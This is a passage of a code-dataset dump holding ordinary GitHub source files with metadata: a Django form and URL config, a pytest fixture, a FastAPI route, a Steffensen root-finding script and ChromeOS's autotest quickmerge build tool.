downloaded | {yt.title}')\nprint(yt.thumbnail_url)\ntime.sleep(1)\nvideo=yt.streams.get_highest_resolution()\ntime.sleep(1)\nvideo.download()\ntime.sleep(1)", "repo_name": "VictorHDS/YTVD", "sub_path": "YTVD.py", "file_name": "YTVD.py", "file_ext": "py", "file_size_in_byte": 335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytube.YouTube", "line_number": 4, "usage_type": "call"}, {"api_name": "pytube.cli.on_progress", "line_number": 4, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 7, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "20599781787", "text": "from django import forms\nfrom apps.projects.models import Document, DocumentType\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass DocumentForm(forms.ModelForm):\n document_type = forms.ModelChoiceField(\n queryset=DocumentType.objects.all(),\n empty_label='Tipo',\n required=False\n )\n\n class Meta:\n model = Document\n fields = ['title', 'description', 'document_type', 'number',\n 'year', 'themes', 'owner']\n\n\nclass DocumentAdminForm(forms.ModelForm):\n file_txt = forms.FileField(label=_('File in txt format'), required=False)\n\n class Meta:\n model = Document\n fields = ['title', 'slug', 'description', 'document_type', 'number',\n 'year', 'themes', 'owner']\n", "repo_name": "labhackercd/new-wikilegis", "sub_path": "src/apps/projects/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "apps.projects.models.DocumentType.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "apps.projects.models.DocumentType.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "apps.projects.models.DocumentType", "line_number": 8, "usage_type": "name"}, {"api_name": "apps.projects.models.Document", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 20, "usage_type": "call"}, {"api_name": "apps.projects.models.Document", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "27508449786", "text": "import pytest\nfrom application.app import create_app\n\n@pytest.fixture\ndef app():\n app = create_app(\"testing\")\n return app\n\n@pytest.fixture(scope=\"function\")\ndef session(app):\n with app.app_context():\n from application.database import Base, engine, db_session\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\n yield db_session", "repo_name": "SolidCake98/MLService", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "application.app.create_app", "line_number": 6, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 4, "usage_type": "attribute"}, {"api_name": "application.database.Base.metadata.drop_all", "line_number": 13, "usage_type": "call"}, {"api_name": "application.database.engine", "line_number": 13, "usage_type": "argument"}, {"api_name": "application.database.Base.metadata", "line_number": 13, "usage_type": "attribute"}, {"api_name": "application.database.Base", "line_number": 13, "usage_type": "name"}, {"api_name": "application.database.Base.metadata.create_all", "line_number": 14, "usage_type": "call"}, {"api_name": "application.database.engine", "line_number": 14, "usage_type": "argument"}, {"api_name": "application.database.Base.metadata", "line_number": 14, "usage_type": "attribute"}, {"api_name": "application.database.Base", "line_number": 14, "usage_type": "name"}, {"api_name": "application.database.db_session", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "30268965450", "text": "# -*- coding: utf-8 -*- \n\"\"\" ++++++++++++++++++++++++++++++++++++++\n@product->name PyCharm\n@project->name platform_python\n@editor->name Sanliy\n@file->name product_line.py\n@create->time 2023/5/30-9:33\n@desc->\n++++++++++++++++++++++++++++++++++++++ \"\"\"\nfrom fastapi import APIRouter\nfrom starlette.responses import HTMLResponse\n\nfrom base.c_mysql import CMysql\nfrom base.c_logger import CLogger\nfrom base.c_project import CProject\nfrom starlette.requests import Request\n\nlogger = CLogger()\ncm = CMysql()\n\nrouter = APIRouter(\n prefix=\"/product\",\n tags=[\"product\"],\n responses={404: {\"description\": \"Not Found\"}}\n)\n\ntemplates = CProject.get_template()\n\n\n@router.get(\"/lines\", response_class=HTMLResponse)\nasync def home(request: Request):\n all_nodes_msg = cm.fetchall(\n '''\n select node_id, node_zh_name, node_type from python_platform.do_nodes\n '''\n )\n all_nodes_dequeue = []\n for one_nodes in all_nodes_msg:\n one_nodes_msg = {}\n one_nodes_msg[\"node_id\"] = one_nodes[0]\n one_nodes_msg[\"one_node_zh_name\"] = one_nodes[1]\n one_nodes_msg[\"onde_node_type\"] = one_nodes[2]\n all_nodes_dequeue.append(one_nodes_msg)\n return templates.TemplateResponse(\"product_lines.html\", {\"request\": request, \"all_nodes_msg\": all_nodes_dequeue})\n", "repo_name": "sanliyang/platform_python", "sub_path": "platform_python/front_desk/product/product_line.py", "file_name": "product_line.py", "file_ext": "py", "file_size_in_byte": 1301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base.c_logger.CLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "base.c_mysql.CMysql", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 21, "usage_type": "call"}, {"api_name": "base.c_project.CProject.get_template", "line_number": 27, "usage_type": "call"}, {"api_name": "base.c_project.CProject", "line_number": 27, "usage_type": "name"}, {"api_name": "starlette.requests.Request", "line_number": 31, "usage_type": "name"}, {"api_name": "starlette.responses.HTMLResponse", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "15361687537", "text": "from sympy import *\nfrom tabulate import tabulate\n\na = 0\nb = 0\nerror = 0\n\nx = Symbol(\"x\")\nf=\"\"\nfx = str(f)\nf = lambda x: eval(fx)\n\n# Metodo de Steffensen\ndef Steffensen(a, b, error):\n tabla = []\n ep = 0\n i=1\n #Calcular x0\n x0 = (a+b)/2\n xn=x0\n\n while (ep >= error or ep == 0):\n #p1 = f(x_n)\n p1 = f(xn)\n\n #p2 = f(x_n)\n p2 = f(xn+p1)\n try:\n #p = x_n+1 = xn - (f(x)^2/(f(xn + f(xn))-f(xn))\n p = xn - (pow(p1,2)/(p2 - p1)) \n except ZeroDivisionError:\n break\n ep = abs((p-xn)/p)*100\n tabla.append([i, xn, p1, p2, p, ep])\n xn = p\n i+=1 \n return(tabla)\n\n\n# Menú\ncontinuar = True\nwhile continuar:\n try:\n print(\"\"\"\n\n Proyecto 3 - Métodos de Steffensen\n [1]Presentación\n [2]Método de Steffensen\n \"\"\")\n opt = int(input(\"Seleccione una opción: \"))\n\n if(opt < 1 or opt > 2):\n print(\"opcion equivocada, favor validar\")\n else:\n\n if opt>1:\n fx = input(\"Ingrese la funcion: \")\n print(\"Ingrese el intervalo a evaluar:\")\n a = float(input(\"a: \"))\n b = float(input(\"b: \"))\n\n assert a<b\n assert f(a)*f(b)<0\n\n error = float(input(\"error: \"))\n if opt == 1:\n print(\"\"\"\n Desarrollado por:\n Cortez, Brandool\n Estribí, Fernando\n\n Grupo: 1SF131\"\"\")\n elif opt == 2:\n tabla = Steffensen(a, b, error)\n ntabla = len(tabla)\n\n # Salida del metodo de Steffensen\n header = ['i', 'xn', 'f(xn)', 'f(xn + f(xn))', 'xn+1', 'ep']\n print(tabulate(tabla, headers=header, floatfmt=\".4f\"))\n\n print('raiz: ', \"{:.4f}\".format(tabla[len(tabla)-1][4]))\n print('error: ', \"{:.4f}\".format(tabla[ len(tabla)-1][5]))\n \n except ValueError:\n print(\"Dato ingresado no numérico. Intente de nuevo.\")\n except AssertionError:\n print(\"\"\"Se deben cumplir las siguientes condiciones:\n a<b \n f(a)*f(b)<0\n Intente de nuevo.\"\"\")\n\n answer = None\n while answer not in (\"y\", \"n\"):\n answer = input(\"¿Desea realizar otro procedimiento? [y/n]: \")\n if answer == \"y\":\n pass\n elif answer == \"n\":\n continuar = False\n else:\n print(\"Opcion invalida. Intente de nuevo.\")", "repo_name": "fernandojose21/PY3-SteffensenMethod", "sub_path": "Steffensen.py", "file_name": "Steffensen.py", "file_ext": "py", "file_size_in_byte": 2605, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tabulate.tabulate", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "12537846585", "text": "from __future__ import print_function\n\nimport argparse\nimport glob\nimport os\nimport re\nimport sys\nfrom collections import namedtuple\n\nfrom chromite.lib import constants\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import git\nfrom chromite.lib import osutils\nfrom chromite.lib import portage_util\n\nif cros_build_lib.IsInsideChroot():\n # Only import portage after we've checked that we're inside the chroot.\n import portage\n\n\nINCLUDE_PATTERNS_FILENAME = 'autotest-quickmerge-includepatterns'\nAUTOTEST_PROJECT_NAME = 'chromiumos/third_party/autotest'\nAUTOTEST_EBUILD = 'chromeos-base/autotest'\nDOWNGRADE_EBUILDS = ['chromeos-base/autotest']\n\nIGNORE_SUBDIRS = ['ExternalSource',\n 'logs',\n 'results',\n 'site-packages']\n\n# Data structure describing a single rsync filesystem change.\n#\n# change_description: An 11 character string, the rsync change description\n# for the particular file.\n# absolute_path: The absolute path of the created or modified file.\nItemizedChange = namedtuple('ItemizedChange', ['change_description',\n 'absolute_path'])\n\n# Data structure describing the rsync new/modified files or directories.\n#\n# new_files: A list of ItemizedChange objects for new files.\n# modified_files: A list of ItemizedChange objects for modified files.\n# new_directories: A list of ItemizedChange objects for new directories.\nItemizedChangeReport = namedtuple('ItemizedChangeReport',\n ['new_files', 'modified_files',\n 'new_directories'])\n\n\nclass PortagePackageAPIError(Exception):\n \"\"\"Exception thrown when unable to retrieve a portage package API.\"\"\"\n\n\ndef GetStalePackageNames(change_list, autotest_sysroot):\n \"\"\"Given a rsync change report, returns the names of stale test packages.\n\n This function pulls out test package names for client-side tests, stored\n within the client/site_tests directory tree, that had any files added or\n modified and for whom any existing bzipped test packages may now be stale.\n\n Args:\n change_list: A list of ItemizedChange objects corresponding to changed\n or modified files.\n autotest_sysroot: Absolute path of autotest in the sysroot,\n e.g. '/build/lumpy/usr/local/build/autotest'\n\n Returns:\n A list of test package names, eg ['factory_Leds', 'login_UserPolicyKeys'].\n May contain duplicate entries if multiple files within a test directory\n were modified.\n \"\"\"\n exp = os.path.abspath(autotest_sysroot) + r'/client/site_tests/(.*?)/.*'\n matches = [re.match(exp, change.absolute_path) for change in change_list]\n return [match.group(1) for match in matches if match]\n\n\ndef ItemizeChangesFromRsyncOutput(rsync_output, destination_path):\n \"\"\"Convert the output of an rsync with `-i` to a ItemizedChangeReport object.\n\n Args:\n rsync_output: String stdout of rsync command that was run with `-i` option.\n destination_path: String absolute path of the destination directory for the\n rsync operations. This argument is necessary because\n rsync's output only gives the relative path of\n touched/added files.\n\n Returns:\n ItemizedChangeReport object giving the absolute paths of files that were\n created or modified by rsync.\n \"\"\"\n modified_matches = re.findall(r'([.>]f[^+]{9}) (.*)', rsync_output)\n new_matches = re.findall(r'(>f\\+{9}) (.*)', rsync_output)\n new_symlink_matches = re.findall(r'(cL\\+{9}) (.*) -> .*', rsync_output)\n new_dir_matches = re.findall(r'(cd\\+{9}) (.*)', rsync_output)\n\n absolute_modified = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in modified_matches]\n\n # Note: new symlinks are treated as new files.\n absolute_new = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in new_matches + new_symlink_matches]\n\n absolute_new_dir = [ItemizedChange(c, os.path.join(destination_path, f))\n for (c, f) in new_dir_matches]\n\n return ItemizedChangeReport(new_files=absolute_new,\n modified_files=absolute_modified,\n new_directories=absolute_new_dir)\n\n\ndef GetPackageAPI(portage_root, package_cp):\n \"\"\"Gets portage API handles for the given package.\n\n Args:\n portage_root: Root directory of portage tree. Eg '/' or '/build/lumpy'\n package_cp: A string similar to 'chromeos-base/autotest-tests'.\n\n Returns:\n Returns (package, vartree) tuple, where\n package is of type portage.dbapi.vartree.dblink\n vartree is of type portage.dbapi.vartree.vartree\n \"\"\"\n if portage_root is None:\n # pylint: disable=no-member\n portage_root = portage.root\n # Ensure that portage_root ends with trailing slash.\n portage_root = os.path.join(portage_root, '')\n\n # Create a vartree object corresponding to portage_root.\n trees = portage.create_trees(portage_root, portage_root)\n vartree = trees[portage_root]['vartree']\n\n # List the matching installed packages in cpv format.\n matching_packages = vartree.dbapi.cp_list(package_cp)\n\n if not matching_packages:\n raise PortagePackageAPIError('No matching package for %s in portage_root '\n '%s' % (package_cp, portage_root))\n\n if len(matching_packages) > 1:\n raise PortagePackageAPIError('Too many matching packages for %s in '\n 'portage_root %s' % (package_cp,\n portage_root))\n\n # Convert string match to package dblink.\n package_cpv = matching_packages[0]\n package_split = portage_util.SplitCPV(package_cpv)\n # pylint: disable=no-member\n package = portage.dblink(package_split.category,\n package_split.pv, settings=vartree.settings,\n vartree=vartree)\n\n return package, vartree\n\n\ndef DowngradePackageVersion(portage_root, package_cp,\n downgrade_to_version='0'):\n \"\"\"Downgrade the specified portage package version.\n\n Args:\n portage_root: Root directory of portage tree. Eg '/' or '/build/lumpy'\n package_cp: A string similar to 'chromeos-base/autotest-tests'.\n downgrade_to_version: String version to downgrade to. Default: '0'\n\n Returns:\n True on success. False on failure (nonzero return code from `mv` command).\n \"\"\"\n try:\n package, _ = GetPackageAPI(portage_root, package_cp)\n except PortagePackageAPIError:\n # Unable to fetch a corresponding portage package API for this\n # package_cp (either no such package, or name ambigious and matches).\n # So, just fail out.\n return False\n\n source_directory = package.dbdir\n destination_path = os.path.join(\n package.dbroot, package_cp + '-' + downgrade_to_version)\n if os.path.abspath(source_directory) == os.path.abspath(destination_path):\n return True\n command = ['mv', source_directory, destination_path]\n code = cros_build_lib.SudoRunCommand(command, error_code_ok=True).returncode\n return code == 0\n\n\ndef UpdatePackageContents(change_report, package_cp, portage_root=None):\n \"\"\"Add newly created files/directors to package contents.\n\n Given an ItemizedChangeReport, add the newly created files and directories\n to the CONTENTS of an installed portage package, such that these files are\n considered owned by that package.\n\n Args:\n change_report: ItemizedChangeReport object for the changes to be\n made to the package.\n package_cp: A string similar to 'chromeos-base/autotest-tests' giving\n the package category and name of the package to be altered.\n portage_root: Portage root path, corresponding to the board that\n we are working on. Defaults to '/'\n \"\"\"\n package, vartree = GetPackageAPI(portage_root, package_cp)\n\n # Append new contents to package contents dictionary.\n contents = package.getcontents().copy()\n for _, filename in change_report.new_files:\n contents.setdefault(filename, (u'obj', '0', '0'))\n for _, dirname in change_report.new_directories:\n # Strip trailing slashes if present.\n contents.setdefault(dirname.rstrip('/'), (u'dir',))\n\n # Write new contents dictionary to file.\n vartree.dbapi.writeContentsToContentsFile(package, contents)\n\n\ndef RemoveBzipPackages(autotest_sysroot):\n \"\"\"Remove all bzipped test/dep/profiler packages from sysroot autotest.\n\n Args:\n autotest_sysroot: Absolute path of autotest in the sysroot,\n e.g. '/build/lumpy/usr/local/build/autotest'\n \"\"\"\n osutils.RmDir(os.path.join(autotest_sysroot, 'packages'),\n ignore_missing=True)\n osutils.SafeUnlink(os.path.join(autotest_sysroot, 'packages.checksum'))\n\n\ndef RsyncQuickmerge(source_path, sysroot_autotest_path,\n include_pattern_file=None, pretend=False,\n overwrite=False):\n \"\"\"Run rsync quickmerge command, with specified arguments.\n\n Command will take form `rsync -a [options] --exclude=**.pyc\n --exclude=**.pyo\n [optional --include-from include_pattern_file]\n --exclude=* [source_path] [sysroot_autotest_path]`\n\n Args:\n source_path: Directory to rsync from.\n sysroot_autotest_path: Directory to rsync too.\n include_pattern_file: Optional pattern of files to include in rsync.\n pretend: True to use the '-n' option to rsync, to perform dry run.\n overwrite: True to omit '-u' option, overwrite all files in sysroot,\n not just older files.\n\n Returns:\n The cros_build_lib.CommandResult object resulting from the rsync command.\n \"\"\"\n command = ['rsync', '-a']\n\n # For existing files, preserve destination permissions. This ensures that\n # existing files end up with the file permissions set by the ebuilds.\n # If this script copies over a file that does not exist in the destination\n # tree, it will set the least restrictive permissions allowed in the\n # destination tree. This could happen if the file copied is not installed by\n # *any* ebuild, or if the ebuild that installs the file was never emerged.\n command += ['--no-p', '--chmod=ugo=rwX']\n\n if pretend:\n command += ['-n']\n\n if not overwrite:\n command += ['-u']\n\n command += ['-i']\n\n command += ['--exclude=**.pyc']\n command += ['--exclude=**.pyo']\n\n # Exclude files with a specific substring in their name, because\n # they create an ambiguous itemized report. (see unit test file for details)\n command += ['--exclude=** -> *']\n\n if include_pattern_file:\n command += ['--include-from=%s' % include_pattern_file]\n\n command += ['--exclude=*']\n\n # Some tests use symlinks. Follow these.\n command += ['-L']\n\n command += [source_path, sysroot_autotest_path]\n\n return cros_build_lib.SudoRunCommand(command, redirect_stdout=True)\n\n\ndef ParseArguments(argv):\n \"\"\"Parse command line arguments\n\n Returns:\n parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description='Perform a fast approximation '\n 'to emerge-$board autotest-all, by '\n 'rsyncing source tree to sysroot.')\n\n default_board = cros_build_lib.GetDefaultBoard()\n parser.add_argument('--board', metavar='BOARD', default=default_board,\n help='Board to perform quickmerge for. Default: ' +\n (default_board or 'Not configured.'))\n parser.add_argument('--pretend', action='store_true',\n help='Dry run only, do not modify sysroot autotest.')\n parser.add_argument('--overwrite', action='store_true',\n help='Overwrite existing files even if newer.')\n parser.add_argument('--force', action='store_true',\n help=argparse.SUPPRESS)\n parser.add_argument('--verbose', action='store_true',\n help='Print detailed change report.')\n\n # Used only if test_that is calling autotest_quickmerge and has detected that\n # the sysroot autotest path is still in usr/local/autotest (ie the build\n # pre-dates https://chromium-review.googlesource.com/#/c/62880/ )\n parser.add_argument('--legacy_path', action='store_true',\n help=argparse.SUPPRESS)\n\n return parser.parse_args(argv)\n\n\ndef main(argv):\n cros_build_lib.AssertInsideChroot()\n\n args = ParseArguments(argv)\n\n if os.geteuid() != 0:\n try:\n cros_build_lib.SudoRunCommand([sys.executable] + sys.argv)\n except cros_build_lib.RunCommandError:\n return 1\n return 0\n\n if not args.board:\n print('No board specified. Aborting.')\n return 1\n\n manifest = git.ManifestCheckout.Cached(constants.SOURCE_ROOT)\n checkout = manifest.FindCheckout(AUTOTEST_PROJECT_NAME)\n brillo_autotest_src_path = os.path.join(checkout.GetPath(absolute=True), '')\n\n script_path = os.path.dirname(__file__)\n include_pattern_file = os.path.join(script_path, INCLUDE_PATTERNS_FILENAME)\n\n # TODO: Determine the following string programatically.\n sysroot_path = os.path.join('/build', args.board, '')\n sysroot_autotest_path = os.path.join(sysroot_path,\n constants.AUTOTEST_BUILD_PATH, '')\n if args.legacy_path:\n sysroot_autotest_path = os.path.join(sysroot_path, 'usr/local/autotest',\n '')\n\n # Generate the list of source paths to copy.\n src_paths = {os.path.abspath(brillo_autotest_src_path)}\n for quickmerge_file in glob.glob(os.path.join(sysroot_autotest_path,\n 'quickmerge', '*', '*')):\n try:\n path = osutils.ReadFile(quickmerge_file).strip()\n if path and os.path.exists(path):\n src_paths.add(os.path.abspath(path))\n except IOError:\n logging.error('Could not quickmerge for project: %s',\n os.path.basename(quickmerge_file))\n\n num_new_files = 0\n num_modified_files = 0\n for src_path in src_paths:\n rsync_output = RsyncQuickmerge(src_path +'/', sysroot_autotest_path,\n include_pattern_file, args.pretend,\n args.overwrite)\n\n if args.verbose:\n logging.info(rsync_output.output)\n change_report = ItemizeChangesFromRsyncOutput(rsync_output.output,\n sysroot_autotest_path)\n num_new_files = num_new_files + len(change_report.new_files)\n num_modified_files = num_modified_files + len(change_report.modified_files)\n if not args.pretend:\n logging.info('Updating portage database.')\n UpdatePackageContents(change_report, AUTOTEST_EBUILD, sysroot_path)\n\n if not args.pretend:\n for logfile in glob.glob(os.path.join(sysroot_autotest_path, 'packages',\n '*.log')):\n try:\n # Open file in a try-except block, for atomicity, instead of\n # doing existence check.\n with open(logfile, 'r') as f:\n package_cp = f.readline().strip()\n DOWNGRADE_EBUILDS.append(package_cp)\n except IOError:\n pass\n\n for ebuild in DOWNGRADE_EBUILDS:\n if not DowngradePackageVersion(sysroot_path, ebuild):\n logging.warning('Unable to downgrade package %s version number.',\n ebuild)\n RemoveBzipPackages(sysroot_autotest_path)\n\n sentinel_filename = os.path.join(sysroot_autotest_path,\n '.quickmerge_sentinel')\n cros_build_lib.RunCommand(['touch', sentinel_filename])\n\n if args.pretend:\n logging.info('The following message is pretend only. No filesystem '\n 'changes made.')\n logging.info('Quickmerge complete. Created or modified %s files.',\n num_new_files + num_modified_files)\n\n return 0\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/chromite/scripts/autotest_quickmerge.py", "file_name": "autotest_quickmerge.py", "file_ext": "py", "file_size_in_byte": 15824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chromite.lib.cros_build_lib.IsInsideChroot", "line_number": 17, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 17, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 37, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 73, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 91, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 92, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 93, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "portage.root", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "portage.create_trees", "line_number": 130, "usage_type": "call"}, {"api_name": "chromite.lib.portage_util.SplitCPV", "line_number": 147, "usage_type": "call"}, {"api_name": "chromite.lib.portage_util", "line_number": 147, "usage_type": "name"}, {"api_name": "portage.dblink", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 182, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 182, "usage_type": "name"}, {"api_name": "chromite.lib.osutils.RmDir", "line_number": 222, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 222, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils.SafeUnlink", "line_number": 224, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 224, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 283, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 283, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 292, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib.GetDefaultBoard", "line_number": 296, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 296, "usage_type": "name"}, {"api_name": "argparse.SUPPRESS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 313, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.AssertInsideChroot", "line_number": 319, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 319, "usage_type": "name"}, {"api_name": "os.geteuid", "line_number": 323, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib.SudoRunCommand", "line_number": 325, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 325, "usage_type": "name"}, {"api_name": "sys.executable", "line_number": 325, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 325, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.RunCommandError", "line_number": 326, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 326, "usage_type": "name"}, {"api_name": "chromite.lib.git.ManifestCheckout.Cached", "line_number": 334, "usage_type": "call"}, {"api_name": "chromite.lib.git.ManifestCheckout", "line_number": 334, "usage_type": "attribute"}, {"api_name": "chromite.lib.git", "line_number": 334, "usage_type": "name"}, {"api_name": "chromite.lib.constants.SOURCE_ROOT", "line_number": 334, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 334, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants.AUTOTEST_BUILD_PATH", "line_number": 344, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 344, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils.ReadFile", "line_number": 354, "usage_type": "call"}, {"api_name": "chromite.lib.osutils", "line_number": 354, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 355, "usage_type": "call"}, {"api_name": "os.path", "line_number": 355, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path", "line_number": 356, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_logging.error", "line_number": 358, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 358, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 369, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 369, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 375, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 375, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 379, "usage_type": "call"}, {"api_name": "os.path", "line_number": 379, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_logging.warning", "line_number": 392, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 392, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_build_lib.RunCommand", "line_number": 398, "usage_type": "call"}, {"api_name": "chromite.lib.cros_build_lib", "line_number": 398, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 401, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 401, "usage_type": "name"}, {"api_name": "chromite.lib.cros_logging.info", "line_number": 403, "usage_type": "call"}, {"api_name": "chromite.lib.cros_logging", "line_number": 403, "usage_type": "name"}]} +{"seq_id": "18145576519", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom .views import createTutor, findTutor, createMessage, displayMessages\n\napp_name = 'tutor'\nurlpatterns = [\n path('create/', createTutor, name = 'create-tutor'),\n path('find/', findTutor, name='find-tutor'),\n path('create-message/', createMessage, name='create-message'),\n path('display-messages/<str:pk>', displayMessages, name ='display-messages')\n \n]\n\n", "repo_name": "EthanZhang87/TSASoftwareDEV23-24", "sub_path": "Answerly/tutor/urls.py", "file_name": "urls.py", "file_ext": "py", 